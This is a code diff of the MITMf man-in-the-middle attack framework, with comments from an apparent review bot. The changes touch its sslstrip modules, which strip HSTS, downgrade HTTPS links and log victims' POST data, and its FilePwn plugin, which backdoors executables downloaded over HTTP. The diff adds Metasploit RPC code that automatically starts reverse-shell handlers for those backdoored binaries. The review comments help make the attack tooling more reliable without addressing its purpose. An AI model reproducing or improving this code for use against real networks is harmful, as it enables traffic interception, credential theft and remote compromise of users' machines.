diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py
index 017118c..a132d2b 100644
--- a/core/sslstrip/ClientRequest.py
+++ b/core/sslstrip/ClientRequest.py
@@ -72,7 +72,7 @@ class ClientRequest(Request):
 if 'referer' in headers:
 real = self.urlMonitor.real
 if len(real) > 0:
- dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
+ dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
 headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
 if 'if-none-match' in headers:
@@ -80,13 +80,13 @@ class ClientRequest(Request):
 if 'host' in headers:
 host = self.urlMonitor.URLgetRealHost(str(headers['host']))
- mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host))
+ mitmf_logger.debug("[ClientRequest][HSTS] Modifing HOST header: {} -> {}".format(headers['host'], host))
 headers['host'] = host
 self.setHeader('Host', host)
 if 'accept-encoding' in headers:
 del headers['accept-encoding']
- mitmf_logger.debug("Zapped encoding")
+ mitmf_logger.debug("[ClientRequest] Zapped encoding")
 if 'if-modified-since' in headers:
 del headers['if-modified-since']
@@ -117,7 +117,7 @@ class ClientRequest(Request):
 return "lock.ico"
 def handleHostResolvedSuccess(self, address):
- mitmf_logger.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
+ mitmf_logger.debug("[ClientRequest] Resolved host successfully: {} -> {}".format(self.getHeader('host'), address))
 host = self.getHeader("host")
 headers = self.cleanHeaders()
 client = self.getClientIP()
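Review bot: The alternation built from `real.keys()` on the rewritten `re.compile` line is tried left-to-right in dict order, so a key that is a prefix of another key (a bare host versus the same host with a longer suffix) can match first and leave the Referer only partially rewritten; the %-to-format conversion preserves that. Sorting the keys longest-first makes the substitution deterministic: `keys = sorted(real, key=len, reverse=True)` and then `dregex = re.compile("({})".format("|".join(map(re.escape, keys))))`. While touching the lambda, `x.string[x.start() :x.end()]` is just `x.group()`. The same construct is repeated in the later hunks of this file and in ServerConnection.py, so a single helper that builds the pattern would keep them consistent.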
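Review bot: The rewritten HSTS debug line keeps the misspelling `Modifing`; since this is a log string operators will grep for, fix it in the same change: `mitmf_logger.debug("[ClientRequest][HSTS] Modifying HOST header: {} -> {}".format(headers['host'], host))`. Note that `headers['host']` is taken verbatim from the client, so the logged value is untrusted text.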
@@ -138,13 +138,13 @@ class ClientRequest(Request):
 url = 'http://' + host + path
 self.uri = url # set URI to absolute
- if len(real) > 0:
- dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
+ if real:
+ dregex = re.compile("({})".format("|".join(map(re.escape, real.keys()))))
 path = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), path)
 postData = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), postData)
- if len(patchDict) > 0:
- dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
+ if patchDict:
+ dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
 postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
@@ -155,22 +155,22 @@ class ClientRequest(Request):
 self.dnsCache.cacheResolution(hostparts[0], address)
 if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
- mitmf_logger.debug("Sending expired cookies...")
+ mitmf_logger.debug("[ClientRequest] Sending expired cookies")
 self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client, host, headers, path))
 elif (self.urlMonitor.isSecureFavicon(client, path)):
- mitmf_logger.debug("Sending spoofed favicon response...")
+ mitmf_logger.debug("[ClientRequest] Sending spoofed favicon response")
 self.sendSpoofedFaviconResponse()
 elif (self.urlMonitor.isSecureLink(client, url) or ('securelink' in headers)):
 if 'securelink' in headers:
 del headers['securelink']
- mitmf_logger.debug("Sending request via SSL...(%s %s)" % (client,url))
+ mitmf_logger.debug("[ClientRequest] Sending request via SSL ({})".format((client,url)))
 self.proxyViaSSL(address, self.method, path, postData, headers, self.urlMonitor.getSecurePort(client, url))
 else:
- mitmf_logger.debug("Sending request via HTTP...")
+ mitmf_logger.debug("[ClientRequest] Sending request via HTTP")
 #self.proxyViaHTTP(address, self.method, path, postData, headers)
 port = 80
 if len(hostparts) > 1:
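Review bot: The new `if real:` / `if patchDict:` guards diverge from the `if len(real) > 0:` that the earlier Referer hunk of this same file leaves untouched; pick one form for the file. Inside the guard `postData` is fed to `dregex.sub` unconditionally, and its assignment is above the hunk, so if a body-less request leaves it as `None` the call raises TypeError; a `if postData:` around the two `postData = dregex.sub(...)` lines would make that explicit. As in the Referer hunk, the alternation should be sorted longest-key-first and the lambda can use `x.group()`.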
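Review bot: The rewritten SSL debug line passes the `(client,url)` tuple to a single `{}`, so the log now prints the tuple repr with quotes and double parentheses instead of the two bare values the old `(%s %s)` produced; use two placeholders: `mitmf_logger.debug("[ClientRequest] Sending request via SSL ({} {})".format(client, url))`. The enclosing handleHostResolvedSuccess body continues past this hunk.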
@@ -189,7 +189,7 @@ class ClientRequest(Request):
 address = self.dnsCache.getCachedAddress(host)
 if address != None:
- mitmf_logger.debug("[ClientRequest] Host cached: %s %s" % (host, str(address)))
+ mitmf_logger.debug("[ClientRequest] Host cached: {} {}".format(host, str(address)))
 return defer.succeed(address)
 else:
@@ -197,20 +197,22 @@ class ClientRequest(Request):
 if self.resolver == 'dnschef':
 try:
+ mitmf_logger.debug("[ClientRequest] Resolving with DNSChef")
 address = str(self.customResolver.query(host)[0].address)
 return defer.succeed(address)
 except Exception:
- return defer.fail()
-
+ mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()")
+ return reactor.resolve(host)
+
 elif self.resolver == 'twisted':
 return reactor.resolve(host)
 def process(self):
- mitmf_logger.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host')))
+ mitmf_logger.debug("[ClientRequest] Resolving host: {}".format(self.getHeader('host')))
 host = self.getHeader('host').split(":")[0]
 if self.hsts:
- host = self.urlMonitor.URLgetRealHost("%s"%host)
+ host = self.urlMonitor.URLgetRealHost(str(host))
 deferred = self.resolveHost(host)
 deferred.addCallback(self.handleHostResolvedSuccess)
diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py
index 72e3205..2ce07ac 100644
--- a/core/sslstrip/ServerConnection.py
+++ b/core/sslstrip/ServerConnection.py
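Review bot: The new `except Exception` fallback to `reactor.resolve(host)` throws away the reason DNSChef failed — the DEBUG line carries no exception text, so a misconfigured custom resolver silently degrades to the system resolver, which presumably sends the victim's request to the real host instead of the spoofed one; log it with `except Exception as e:` and `mitmf_logger.exception("[ClientRequest] DNSChef lookup for {} failed, falling back to reactor.resolve()".format(host))` (or at least include `e`), and consider narrowing the catch to IndexError on an empty answer plus the resolver's own error type. `resolveHost` also returns `None` when `self.resolver` is neither 'dnschef' nor 'twisted', and `process()` below then calls `deferred.addCallback` on None; an `else: return defer.fail(ValueError("unknown resolver {}".format(self.resolver)))` closes that hole. `process()` also does `self.getHeader('host').split(":")[0]` on a possibly absent Host header, which is pre-existing but now sits next to the changed line. The start of resolveHost is above this hunk.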
@@ -70,18 +70,18 @@ class ServerConnection(HTTPClient):
 if self.command == 'GET':
 try:
 user_agent = parse(self.headers['user-agent'])
- self.clientInfo = "%s [type:%s-%s os:%s] " % (self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
+ self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family)
 except:
- self.clientInfo = "%s " % self.client.getClientIP()
+ self.clientInfo = "{} ".format(self.client.getClientIP())
- mitmf_logger.info(self.clientInfo + "Sending Request: %s" % self.headers['host'])
+ mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
 self.plugins.hook()
 self.sendCommand(self.command, self.uri)
 def sendHeaders(self):
 for header, value in self.headers.iteritems():
- mitmf_logger.debug("Sending header: (%s => %s)" % (header, value))
+ mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
 self.sendHeader(header, value)
 self.endHeaders()
@@ -92,11 +92,11 @@ class ServerConnection(HTTPClient):
 elif 'keylog' in self.uri:
 self.plugins.hook()
 else:
- mitmf_logger.warning("%s %s Data (%s):\n%s" % (self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
+ mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData))
 self.transport.write(self.postData)
 def connectionMade(self):
- mitmf_logger.debug("HTTP connection made.")
+ mitmf_logger.debug("[ServerConnection] HTTP connection made.")
 self.plugins.hook()
 self.sendRequest()
 self.sendHeaders()
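Review bot: The rewritten clientInfo fallback sits under a bare `except:`, which also swallows KeyboardInterrupt and SystemExit and any genuine bug in `parse`; the failures it plausibly exists for are a missing `user-agent` header (KeyError) and a UA with no version (IndexError on `version[0]`), so write `except (KeyError, IndexError):` or at minimum `except Exception:`. The rewritten info line then indexes `self.headers['host']` outside the try, so a request without a Host header raises KeyError here; `self.headers.get('host', '')` is safer given the value is client-supplied. The enclosing method starts above this hunk.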
@@ -105,11 +105,11 @@ class ServerConnection(HTTPClient):
 self.sendPostData()
 def handleStatus(self, version, code, message):
- mitmf_logger.debug("Got server response: %s %s %s" % (version, code, message))
+ mitmf_logger.debug("[ServerConnection] Got server response: {0} {1} {2}".format(version, code, message))
 self.client.setResponseCode(int(code), message)
 def handleHeader(self, key, value):
- mitmf_logger.debug("[ServerConnection] Receiving header: (%s => %s)" % (key, value))
+ mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
 if (key.lower() == 'location'):
 value = self.replaceSecureLinks(value)
@@ -119,15 +119,15 @@ class ServerConnection(HTTPClient):
 if (key.lower() == 'content-type'):
 if (value.find('image') != -1):
 self.isImageRequest = True
- mitmf_logger.debug("Response is image content, not scanning...")
+ mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
 if (key.lower() == 'content-encoding'):
 if (value.find('gzip') != -1):
- mitmf_logger.debug("Response is compressed...")
+ mitmf_logger.debug("[ServerConnection] Response is compressed...")
 self.isCompressed = True
 elif (key.lower()== 'strict-transport-security'):
- mitmf_logger.info("%s Zapped a strict-trasport-security header" % self.client.getClientIP())
+ mitmf_logger.info("{} Zapped a strict-trasport-security header".format(self.client.getClientIP()))
 elif (key.lower() == 'content-length'):
 self.contentLength = value
@@ -164,10 +164,11 @@ class ServerConnection(HTTPClient):
 def handleResponse(self, data):
 if (self.isCompressed):
- mitmf_logger.debug("[ServerConnection] Decompressing content...")
+ mitmf_logger.debug("[ServerConnection] Decompressing content...")
 data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
 #mitmf_logger.debug("Read from server:\n" + data)
+ mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
 data = self.replaceSecureLinks(data)
 res = self.plugins.hook()
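Review bot: The rewritten `Zapped a strict-trasport-security header` line (typo: transport) only logs; nothing in this hunk actually drops the header, so whether the HSTS header reaches the client depends on the forwarding code below the hunk, which I cannot see. Since stripping HSTS is the whole point of this branch, add a comment that states the contract at the `elif`, e.g. `# deliberately not forwarded to the client (see header forwarding below)`, once you have confirmed the forwarding path skips it. handleHeader's body continues past the hunk.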
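Review bot: The new byte-count debug line is fine, but the `gzip.GzipFile(...).read()` just above it has no error handling: a truncated or non-gzip body sent with `Content-Encoding: gzip` raises IOError here, and an unbounded `.read()` inflates whatever the server sent into memory in one go. At minimum wrap it: `try:` / `data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()` / `except IOError as e: mitmf_logger.warning("[ServerConnection] gzip decode failed: {}".format(e))` and pass the raw body through. handleResponse continues past the hunk.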
@@ -184,7 +185,7 @@ class ServerConnection(HTTPClient):
 try:
 self.shutdown()
 except:
- mitmf_logger.info("Client connection dropped before request finished.")
+ mitmf_logger.info("[ServerConnection] Client connection dropped before request finished.")
 def replaceSecureLinks(self, data):
 if self.hsts:
@@ -193,7 +194,7 @@ class ServerConnection(HTTPClient):
 patchDict = self.urlMonitor.patchDict
 if len(patchDict)>0:
- dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
+ dregex = re.compile("({})".format("|".join(map(re.escape, patchDict.keys()))))
 data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
 iterator = re.finditer(ServerConnection.urlExpression, data)
@@ -202,13 +203,13 @@ class ServerConnection(HTTPClient):
 mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
 nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
- mitmf_logger.debug("[ServerConnection][HSTS] Replacing %s => %s"%(url,nuevaurl))
+ mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
 sustitucion[url] = nuevaurl
 #data.replace(url,nuevaurl)
 #data = self.urlMonitor.DataReemplazo(data)
 if len(sustitucion)>0:
- dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
+ dregex = re.compile("({})".format("|".join(map(re.escape, sustitucion.keys()))))
 data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
 #mitmf_logger.debug("HSTS DEBUG received data:\n"+data)
@@ -227,7 +228,7 @@ class ServerConnection(HTTPClient):
 for match in iterator:
 url = match.group()
- mitmf_logger.debug("Found secure reference: " + url)
+ mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
 url = url.replace('https://', 'http://', 1)
 url = url.replace('&', '&')
diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
index 987db4d..ed3e774 100644
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
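Review bot: The rewritten patchDict `re.compile` line keeps `if len(patchDict)>0:` while the same commit changes the identical guard in ClientRequest.py to `if patchDict:`; the two files should agree. Like the other alternations in this commit, the keys are joined in dict order, so a key that is a prefix of another can match first and rewrite only part of the longer URL in the response body; build the pattern from `sorted(patchDict, key=len, reverse=True)` and use `x.group()` in the lambda. The same applies to the `sustitucion` pattern in the next hunk.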
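Review bot: The context line `url = url.replace('&', '&')` right after the rewritten debug line is a no-op as printed; if the source actually reads `url.replace('&amp;', '&')` (HTML-escaped ampersands inside href attributes) the page rendering lost the entity, otherwise the line should be removed or corrected. Either way a comment such as `# unescape HTML entities in attribute URLs before matching` would stop the next reader from guessing. The loop body continues past the hunk.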
@@ -67,6 +67,7 @@ import multiprocessing
 from libs.bdfactory import pebin
 from libs.bdfactory import elfbin
 from libs.bdfactory import machobin
+from core.msfrpc import Msfrpc
 from plugins.plugin import Plugin
 from tempfile import mkstemp
 from configobj import ConfigObj
@@ -79,7 +80,7 @@ class FilePwn(Plugin):
 desc = "Backdoor executables being sent over http using bdfactory"
 implements = ["handleResponse"]
 tree_output = ["BDFProxy v0.3.2 online"]
- version = "0.2"
+ version = "0.3"
 has_opts = False
 def initialize(self, options):
@@ -109,6 +110,20 @@ class FilePwn(Plugin):
 #NOT USED NOW
 #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
+ #Metasploit options
+ msfcfg = options.configfile['MITMf']['Metasploit']
+ rpcip = msfcfg['rpcip']
+ rpcpass = msfcfg['rpcpass']
+
+ try:
+ self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary
+ self.msf.login('msf', rpcpass)
+ version = self.msf.call('core.version')['version']
+ self.tree_output.append("Connected to Metasploit v%s" % version)
+ except Exception:
+ sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
+
+ #FilePwn options
 self.userConfig = options.configfile['FilePwn']
 self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
 self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
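Review bot: The new `except Exception: sys.exit(...)` in initialize discards the actual error (bad password, connection refused, wrong port), which is exactly what the operator needs to read; use `except Exception as e:` and `sys.exit("[-] Error connecting to MSF ({}): make sure Metasploit and its MSGRPC server are running".format(e))`. `sys` does not appear among the imports visible in this diff, so confirm FilePwn.py already imports it, or the failure path itself raises NameError. Only `host` is passed to `Msfrpc` and the username is fixed to `'msf'`, so whatever port and SSL defaults the library applies are invisible here, and `rpcpass` is read from the config with no check that it is set; a short comment stating those assumptions at `#Metasploit options` would help. Exiting the whole MITMf process from a plugin's initialize rather than disabling the plugin may be intended, but deserves a comment too.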
@@ -123,6 +138,32 @@ class FilePwn(Plugin):
 self.zipblacklist = self.userConfig['ZIP']['blacklist']
 self.tarblacklist = self.userConfig['TAR']['blacklist']
+ self.tree_output.append("Setting up Metasploit payload handlers")
+
+ jobs = self.msf.call('job.list')
+ for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
+ cmd = "use exploit/multi/handler\n"
+ cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
+ cmd += "set LHOST {}\n".format(config["HOST"])
+ cmd += "set LPORT {}\n".format(config["PORT"])
+ cmd += "exploit -j\n"
+
+ if jobs:
+ for pid, name in jobs.iteritems():
+ info = self.msf.call('job.info', [pid])
+ if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
+ #Create a virtual console
+ c_id = self.msf.call('console.create')['id']
+
+ #write the cmd to the newly created console
+ self.msf.call('console.write', [c_id, cmd])
+ else:
+ #Create a virtual console
+ c_id = self.msf.call('console.create')['id']
+
+ #write the cmd to the newly created console
+ self.msf.call('console.write', [c_id, cmd])
+
 def convert_to_Bool(self, aString):
 if aString.lower() == 'true':
 return True
@@ -300,7 +341,7 @@ class FilePwn(Plugin):
 except Exception as e:
 print 'Exception', str(e)
- mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e))
+ mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
 return None
 def tar_files(self, aTarFileBytes, formatt):
diff --git a/plugins/JavaPwn.py b/plugins/JavaPwn.py
index f4a0bfb..15a292d 100644
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@@ -18,13 +18,13 @@
 # USA
 #
-import core.msfrpc as msfrpc
 import string
 import random
 import threading
 import sys
 import logging
+from core.msfrpc import Msfrpc
 from plugins.plugin import Plugin
 from plugins.BrowserProfiler import BrowserProfiler
 from time import sleep
@@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.black_ips = []
 try:
- msf = msfrpc.Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
+ msf = Msfrpc({"host": self.rpcip}) #create an instance of msfrpc libarary
 msf.login('msf', self.rpcpass)
 version = msf.call('core.version')['version']
 self.tree_output.append("Connected to Metasploit v%s" % version)
@@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin):
 self.send_command(cmd, msf, vic_ip)
 self.injectWait(msf, rand_url, vic_ip)
 sleep(1)
-
- def finish(self):
- '''This will be called when shutting down'''
- msf = msfrpc.Msfrpc({"host": self.rpcip})
- msf.login('msf', self.rpcpass)
-
- jobs = msf.call('job.list')
- if len(jobs) > 0:
- print '\n[*] Stopping all running metasploit jobs'
- for k, v in jobs.iteritems():
- msf.call('job.stop', [k])
-
- consoles = msf.call('console.list')['consoles']
- if len(consoles) > 0:
- print "[*] Closing all virtual consoles"
- for console in consoles:
- msf.call('console.destroy', [console['id']])
diff --git a/requirements.txt b/requirements.txt
index 06c30e4..ababa30 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -9,4 +9,5 @@ configobj
 pyyaml
 ua-parser
 Pillow
-pefile
\ No newline at end of file
+pefile
+pypcap
\ No newline at end of file
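Review bot: `pypcap` is added to requirements.txt with no version constraint, like every other entry, so an install is not reproducible and a breaking or compromised release is pulled in silently; pin it to the version you tested (`pypcap==<tested version>`) and consider doing the same for the rest of the file. The hunk also leaves the missing trailing newline in place (`\ No newline at end of file`), which is cheap to fix while touching the last line.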